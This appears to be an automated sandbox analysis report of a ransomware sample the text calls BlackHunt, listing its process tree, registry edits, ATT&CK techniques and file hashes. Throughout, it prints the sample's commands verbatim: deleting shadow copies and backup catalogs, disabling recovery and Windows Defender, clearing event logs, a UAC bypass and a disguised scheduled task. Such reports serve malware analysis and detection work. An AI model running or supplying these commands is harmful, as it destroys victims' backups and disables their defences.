68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 54 PID 2408 wrote to memory of 1940 2408 cmd.exe 56 PID 2408 wrote to memory of 1940 2408 cmd.exe 56 PID 2408 wrote to memory of 1940 2408 cmd.exe 56 PID 2768 wrote to memory of 1608 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 57 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe"C:\Users\Admin\AppData\Local\Temp\68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2768 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2860
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2744 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2748
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2712 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:2760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2852 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:1964
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:2620
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2888
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2408 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2168
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:2296
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2632
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:1816
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2708
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:1408
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2636
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:1712
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2372
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:2032
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:1608
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:924
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2676
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:356
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2908
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:1236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:3008
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:1644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:3052
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:2248
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1912
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2240
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:1908
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:1048
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2204
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2012
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:2556
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:2044
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:2080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:804
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:2200
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1884
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:1104
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:2560
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:1552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1388
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1340
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1916
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2848
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2344
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:360
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:1876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe" /F2⤵PID:1016
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe" /F3⤵
- Creates scheduled task(s)
PID:3024
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2952
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2892
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1632
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2700
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:696
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:2724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1028
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:2616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:580
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1384
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1444
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1068
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:1992
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1812
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:3020
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1772
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:960
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:648
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:1720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:3000
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:2496
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:2160
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:2228
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:2304
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:1508
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:4360
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2928
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:2584
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:2596
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3032
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2940
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2836
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:212
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:3948
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:3432
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:636
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:4612
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:356
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:3664
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:3300
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:3568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:1912
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:3752
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:3232
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:3580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:3556
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:4576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:4600
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:3820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:4652
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:3720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:3600
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3176
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:1564
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:3084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:3628
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:596
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe"2⤵
- Deletes itself
PID:4508 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:1924
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2984
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2032
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:3860
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:3092
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\1⤵
- Enumerates connected drives
PID:3160
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\1⤵PID:3792
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
684B
MD574d46eee0f7e1d64b28a2e9bbb03a824
SHA121a90afc06f1a16b1d9b79c8fe19d718aa6d520f
SHA256ab1b6d1a84ed2ff70b1488a38d97fb701d2ec711c19b1b87f91c697dcb93df2d
SHA512c4a30c69f3c2e50b83c12292df19fe8628478ed2b74de791a868513bf2e7e3ce4fda7b15f7f53a5d7fdbc7f6ec1073925e1b80b1a20d8ad66360e4bd31f7d3c1
-
Filesize
1KB
MD58526fdf3fc421ce78e90a79a2997b047
SHA173d2f4cddc04578d96fb80df84309718cf3355ba
SHA2560406b4e29abd591447a2e67c65e94506d1dcbf6998cf0242d9a37384768ebe21
SHA51274dba9f6d6039b7c59600a1661c29c1aa7478f3d47f51261859e7a4c54701f98bd96e23d76330ec4b76df42f4cbf64654bb83b82a402c7815292dd93240ac458
-
Filesize
12KB
MD5a504137e7cfade56f1561330b5c02964
SHA1f7b60623de60caf099ca397db6fe9c98ef9e33db
SHA256b13d2827c75201d34ef1bd640c4b19a5dd3b03b0eaf1f86833174338585e746f
SHA512789db6a580dff9b0047ce994845dfcd1e17d371935ad228ff91bd52fb4b7d366c560d2590dff1f36fec96e7368fc01647d27455bf43fa0284f20f3acbb28ad67